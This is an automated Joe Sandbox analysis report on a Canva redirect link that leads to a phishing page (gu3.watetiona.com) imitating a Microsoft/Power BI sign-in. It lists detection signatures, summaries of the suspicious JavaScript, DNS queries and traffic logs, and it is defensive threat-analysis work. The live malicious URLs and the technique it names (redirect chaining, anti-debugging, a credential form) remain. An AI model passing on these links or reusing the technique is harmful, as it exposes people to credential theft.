Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://www.canva.com/link?target=https%3A%2F%2Fgu3.watetiona.com%2FYEcft%2F&design=DAGZLjls8N8&accessRole=viewer&linkSource=document

Overview

General Information

Sample URL:https://www.canva.com/link?target=https%3A%2F%2Fgu3.watetiona.com%2FYEcft%2F&design=DAGZLjls8N8&accessRole=viewer&linkSource=document
Analysis ID:1574985
Infos:

Detection

HTMLPhisher
Score:52
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected HtmlPhish44
AI detected suspicious Javascript
Form action URLs do not match main URL
HTML body contains low number of good links
HTML page contains hidden javascript code
HTML title does not match URL
Stores files to the Windows start menu directory

Classification

  • System is w10x64_ra
  • chrome.exe (PID: 6804 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 6992 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2192 --field-trial-handle=1904,i,9976407154716733636,9960061309519468343,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6504 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.canva.com/link?target=https%3A%2F%2Fgu3.watetiona.com%2FYEcft%2F&design=DAGZLjls8N8&accessRole=viewer&linkSource=document" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
SourceRuleDescriptionAuthorStrings
dropped/chromecache_271JoeSecurity_HtmlPhish_44Yara detected HtmlPhish_44Joe Security
    No Sigma rule has matched
    No Suricata rule has matched

    Click to jump to signature section

    Show All Signature Results

    Phishing

    barindex
    Source: Yara matchFile source: dropped/chromecache_271, type: DROPPED
    Source: 0.2.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://www.canva.com/link?target=https%3A%2F%2Fgu... The provided JavaScript snippet exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and interaction with suspicious domains. While some of the behavior may be related to legitimate functionality, the overall risk profile is concerning and requires further investigation.
    Source: 1.6..script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://static.canva.com/web/e15e945e8b4aba4c.runt... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. While some of the behaviors may be related to legitimate functionality like analytics or module loading, the overall level of risk is high due to the presence of multiple malicious indicators. Further investigation is recommended to determine the true intent and purpose of this script.
    Source: 0.22.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://gu3.watetiona.com/YEcft/... This script demonstrates several high-risk behaviors, including detecting the presence of web automation tools, disabling common browser developer tools, and redirecting the user to an external domain. While the intent behind the script is not entirely clear, the combination of these behaviors suggests a high likelihood of malicious or suspicious activity.
    Source: 0.21.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://gu3.watetiona.com/YEcft/... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to suspicious domains. The use of obfuscated code and the presence of anti-debugging techniques further increase the risk. Overall, this script demonstrates a high likelihood of malicious intent and should be treated with caution.
    Source: 0.23.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://gu3.watetiona.com/YEcft/... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to suspicious domains. The script uses the `turnstile.render()` function, which can execute arbitrary code, and it sends user data to an unknown domain. Additionally, the script redirects the user to the 'powerbi.microsoft.com' domain, which is inconsistent with the apparent purpose of the script. These behaviors indicate a high likelihood of malicious intent, warranting a high-risk score.
    Source: 1.13..script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://static.canva.com/web/71f6dba82cb18a30.js... This JavaScript snippet exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. The use of `__webpack_require__` to execute remote code and the creation of a global object `self._fe4d99ebe0d2d259646a80d250150d47` are particularly concerning. Additionally, the script appears to be interacting with IndexedDB, which could be used for data storage and exfiltration. Overall, the combination of these behaviors suggests this script is likely malicious and should be further investigated.
    Source: https://www.microsoft.com/en-us/power-platform/products/power-bi/HTTP Parser: Form action: https://login.microsoftonline.com/organizations/oauth2/v2.0/authorize?client_id=10fa57ef-4895-4ab2-872c-8c3613d4f7fb&redirect_uri=https%3A%2F%2Fwww.microsoft.com%2Fcascadeauth%2Faccount%2Fsignin-oidc&response_type=code&prompt=none&scope=openid%20profile%20offline_access&code_challenge=MZnJCJZii27ecNB1gjjXxulOJdUVFl6W6kqL61sUAh4&code_challenge_method=S256&response_mode=form_post&nonce=638697249980504894.NTY5ODJmN2MtMGZjNS00YWIyLTlhNzgtYTBkNGY3ODRhNWQwMGM3YTQ1NjUtZWExYi00ZDgzLTljNTctMTgwYjU2MTg3YTc2&client_info=1&x-client-brkrver=IDWeb.3.2.0.0&msafed=0&claims=%7B%22compact%22%3A%7B%22name%22%3A%7B%22essential%22%3Atrue%7D%7D%7D&state=CfDJ8P_pstto1o1NgBRsh8q_Vvhm642ho9maFANHURo9u9-svsxYA_etkMI3hACn7WOYk3-LpBy3pAl3GeR7UyKOKtJBIcig1GGtDNRdakPJDcFAx3Wq2B-ZSUB9d6ZCx8bqCyhtKOdVG-6ysqsHLz80IF_OgDkckwl4jdmkVwTW6K_vMy6lYbcmcDmIAfdHl_3keWVrHLTwGmnh4ohpn7cI3Q_-4Xps7ovYyUKOTJTpk0JeqF47pYtilaTQGHFLYBWEXQv5yaNM9r8n0jKnWF0tdBKusqilNf9qpLMKJyYyTS5PMKaXqvxf6E6PVSQ9e_dOtKFI2EEVWBmQk6wIcwUY99wsxyUuljWO6OSYgc2od2dgDtqgukdh41-ZeH9GqVovBQZrhyG-FYdB_9U_p9NjfMY3pxoGeQQU-N4MzX0LDV-Jsv10CC39MqIswp1EjG0dhrdo1S9vmosFjfflIpFLfYklYarHwQLa71E2YCSZph8Y6ix7VRdw-7HP9Eec71zJdOLTY86XDHe3rwA_7ko7ZcE&x-client-SKU=ID_NET6_0&x-client-ver=8.1.0.0&sso_reload=true microsoft microsoftonline
    Source: https://www.microsoft.com/en-us/power-platform/products/power-bi/HTTP Parser: Number of links: 0
    Source: https://www.canva.com/link?target=https%3A%2F%2Fgu3.watetiona.com%2FYEcft%2F&design=DAGZLjls8N8&accessRole=viewer&linkSource=documentHTTP Parser: Base64 decoded: 1734128130.000000
    Source: https://www.microsoft.com/en-us/power-platform/products/power-bi/HTTP Parser: Title: Redirecting does not match URL
    Source: https://gu3.watetiona.com/YEcft/HTTP Parser: No favicon
    Source: https://www.microsoft.com/en-us/power-platform/products/power-bi/HTTP Parser: No favicon
    Source: https://www.microsoft.com/en-us/power-platform/products/power-bi/HTTP Parser: No favicon
    Source: https://www.microsoft.com/en-us/power-platform/products/power-bi/HTTP Parser: No favicon
    Source: https://www.microsoft.com/en-us/power-platform/products/power-bi/HTTP Parser: No favicon
    Source: https://www.microsoft.com/en-us/power-platform/products/power-bi/HTTP Parser: No favicon
    Source: https://www.microsoft.com/en-us/power-platform/products/power-bi/HTTP Parser: No favicon
    Source: https://www.microsoft.com/en-us/power-platform/products/power-bi/HTTP Parser: No favicon
    Source: https://www.microsoft.com/en-us/power-platform/products/power-bi/HTTP Parser: No favicon
    Source: https://www.microsoft.com/en-us/power-platform/products/power-bi/HTTP Parser: No favicon
    Source: https://www.microsoft.com/en-us/power-platform/products/power-bi/HTTP Parser: No favicon
    Source: https://www.microsoft.com/en-us/power-platform/products/power-bi/HTTP Parser: No favicon
    Source: https://www.microsoft.com/en-us/power-platform/products/power-bi/HTTP Parser: No favicon
    Source: https://www.microsoft.com/en-us/power-platform/products/power-bi/HTTP Parser: No favicon
    Source: https://www.microsoft.com/en-us/power-platform/products/power-bi/HTTP Parser: No <meta name="author".. found
    Source: https://www.microsoft.com/en-us/power-platform/products/power-bi/HTTP Parser: No <meta name="author".. found
    Source: https://www.microsoft.com/en-us/power-platform/products/power-bi/HTTP Parser: No <meta name="copyright".. found
    Source: https://www.microsoft.com/en-us/power-platform/products/power-bi/HTTP Parser: No <meta name="copyright".. found
    Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.16:49718 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.16:49735 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.16:49754 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.16:49805 version: TLS 1.2
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
    Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
    Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
    Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
    Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
    Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
    Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
    Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
    Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
    Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
    Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
    Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
    Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
    Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
    Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
    Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
    Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
    Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
    Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
    Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
    Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
    Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
    Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
    Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
    Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
    Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
    Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
    Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
    Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
    Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
    Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
    Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
    Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
    Source: global trafficDNS traffic detected: DNS query: www.canva.com
    Source: global trafficDNS traffic detected: DNS query: static.canva.com
    Source: global trafficDNS traffic detected: DNS query: www.google.com
    Source: global trafficDNS traffic detected: DNS query: o13855.ingest.sentry.io
    Source: global trafficDNS traffic detected: DNS query: static.cloudflareinsights.com
    Source: global trafficDNS traffic detected: DNS query: gu3.watetiona.com
    Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
    Source: global trafficDNS traffic detected: DNS query: code.jquery.com
    Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
    Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
    Source: global trafficDNS traffic detected: DNS query: 5igcqa810yp2rcmgvohmmeoewkmyvjbw4uvf8uaagn99durqrlobvm.birsbunh.ru
    Source: global trafficDNS traffic detected: DNS query: cdn.botframework.com
    Source: global trafficDNS traffic detected: DNS query: play.vidyard.com
    Source: global trafficDNS traffic detected: DNS query: publisher.liveperson.net
    Source: global trafficDNS traffic detected: DNS query: lpcdn.lpsnmedia.net
    Source: global trafficDNS traffic detected: DNS query: js.monitor.azure.com
    Source: global trafficDNS traffic detected: DNS query: assets.adobedtm.com
    Source: global trafficDNS traffic detected: DNS query: login.microsoftonline.com
    Source: global trafficDNS traffic detected: DNS query: lptag.liveperson.net
    Source: global trafficDNS traffic detected: DNS query: dpm.demdex.net
    Source: global trafficDNS traffic detected: DNS query: aadcdn.msftauth.net
    Source: global trafficDNS traffic detected: DNS query: mscom.demdex.net
    Source: global trafficDNS traffic detected: DNS query: msftenterprise.sc.omtrdc.net
    Source: global trafficDNS traffic detected: DNS query: ib.adnxs.com
    Source: global trafficDNS traffic detected: DNS query: idsync.rlcdn.com
    Source: global trafficDNS traffic detected: DNS query: accdn.lpsnmedia.net
    Source: global trafficDNS traffic detected: DNS query: static-assets.fs.liveperson.com
    Source: global trafficDNS traffic detected: DNS query: cm.g.doubleclick.net
    Source: global trafficDNS traffic detected: DNS query: rtd.tubemogul.com
    Source: global trafficDNS traffic detected: DNS query: idpix.media6degrees.com
    Source: global trafficDNS traffic detected: DNS query: analytics.twitter.com
    Source: global trafficDNS traffic detected: DNS query: rtd-tm.everesttech.net
    Source: global trafficDNS traffic detected: DNS query: match.adsrvr.org
    Source: global trafficDNS traffic detected: DNS query: cms.quantserve.com
    Source: global trafficDNS traffic detected: DNS query: cm.everesttech.net
    Source: global trafficDNS traffic detected: DNS query: servedby.flashtalking.com
    Source: global trafficDNS traffic detected: DNS query: a.tribalfusion.com
    Source: global trafficDNS traffic detected: DNS query: cms.analytics.yahoo.com
    Source: global trafficDNS traffic detected: DNS query: s.tribalfusion.com
    Source: global trafficDNS traffic detected: DNS query: px.owneriq.net
    Source: global trafficDNS traffic detected: DNS query: va.v.liveperson.net
    Source: global trafficDNS traffic detected: DNS query: jadserve.postrelease.com
    Source: global trafficDNS traffic detected: DNS query: ups.analytics.yahoo.com
    Source: global trafficDNS traffic detected: DNS query: ds.reson8.com
    Source: global trafficDNS traffic detected: DNS query: bttrack.com
    Source: global trafficDNS traffic detected: DNS query: dmpsync.3lift.com
    Source: global trafficDNS traffic detected: DNS query: ag.innovid.com
    Source: global trafficDNS traffic detected: DNS query: rtb.adentifi.com
    Source: global trafficDNS traffic detected: DNS query: sync.crwdcntrl.net
    Source: global trafficDNS traffic detected: DNS query: sync-tm.everesttech.net
    Source: global trafficDNS traffic detected: DNS query: pixel.rubiconproject.com
    Source: global trafficDNS traffic detected: DNS query: www.clarity.ms
    Source: global trafficDNS traffic detected: DNS query: dsum-sec.casalemedia.com
    Source: global trafficDNS traffic detected: DNS query: us-u.openx.net
    Source: global trafficDNS traffic detected: DNS query: image2.pubmatic.com
    Source: global trafficDNS traffic detected: DNS query: sync.search.spotxchange.com
    Source: global trafficDNS traffic detected: DNS query: trc.taboola.com
    Source: global trafficDNS traffic detected: DNS query: z.clarity.ms
    Source: global trafficDNS traffic detected: DNS query: www.facebook.com
    Source: global trafficDNS traffic detected: DNS query: sync.srv.stackadapt.com
    Source: global trafficDNS traffic detected: DNS query: munchkin.marketo.net
    Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49982
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49981
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50054
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50055
    Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50022 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50061
    Source: unknownNetwork traffic detected: HTTP traffic on port 50154 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50182
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50060
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50181
    Source: unknownNetwork traffic detected: HTTP traffic on port 49990 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50062
    Source: unknownNetwork traffic detected: HTTP traffic on port 50102 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50211 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
    Source: unknownNetwork traffic detected: HTTP traffic on port 50045 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50125 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49978
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
    Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49975
    Source: unknownNetwork traffic detected: HTTP traffic on port 50194 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49974
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
    Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49996 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49971
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50186
    Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50069
    Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50222 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50216 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50070
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50191
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50190
    Source: unknownNetwork traffic detected: HTTP traffic on port 50004 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50072
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50193
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50071
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50195
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50194
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
    Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49978 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49965
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49964
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
    Source: unknownNetwork traffic detected: HTTP traffic on port 50227 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
    Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50195 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50147 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50172 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50076
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50075
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50078
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50199
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50077
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50198
    Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50079
    Source: unknownNetwork traffic detected: HTTP traffic on port 49933 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
    Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49956
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49954
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49953
    Source: unknownNetwork traffic detected: HTTP traffic on port 50062 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49951
    Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50079 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50136 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50093
    Source: unknownNetwork traffic detected: HTTP traffic on port 50153 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
    Source: unknownNetwork traffic detected: HTTP traffic on port 50210 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
    Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
    Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
    Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50170 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50061 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50138
    Source: unknownNetwork traffic detected: HTTP traffic on port 50193 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50019
    Source: unknownNetwork traffic detected: HTTP traffic on port 49951 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
    Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50011
    Source: unknownNetwork traffic detected: HTTP traffic on port 50055 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50014
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50135
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50013
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50016
    Source: unknownNetwork traffic detected: HTTP traffic on port 50078 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50137
    Source: unknownNetwork traffic detected: HTTP traffic on port 50221 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50136
    Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
    Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
    Source: unknownNetwork traffic detected: HTTP traffic on port 50215 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
    Source: unknownNetwork traffic detected: HTTP traffic on port 50144 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
    Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49895
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50021
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50020
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50144
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50022
    Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50146
    Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50147
    Source: unknownNetwork traffic detected: HTTP traffic on port 49911 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50000 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50021 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50138 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50155 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49991 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
    Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
    Source: unknownNetwork traffic detected: HTTP traffic on port 50038 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
    Source: unknownNetwork traffic detected: HTTP traffic on port 50011 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50153
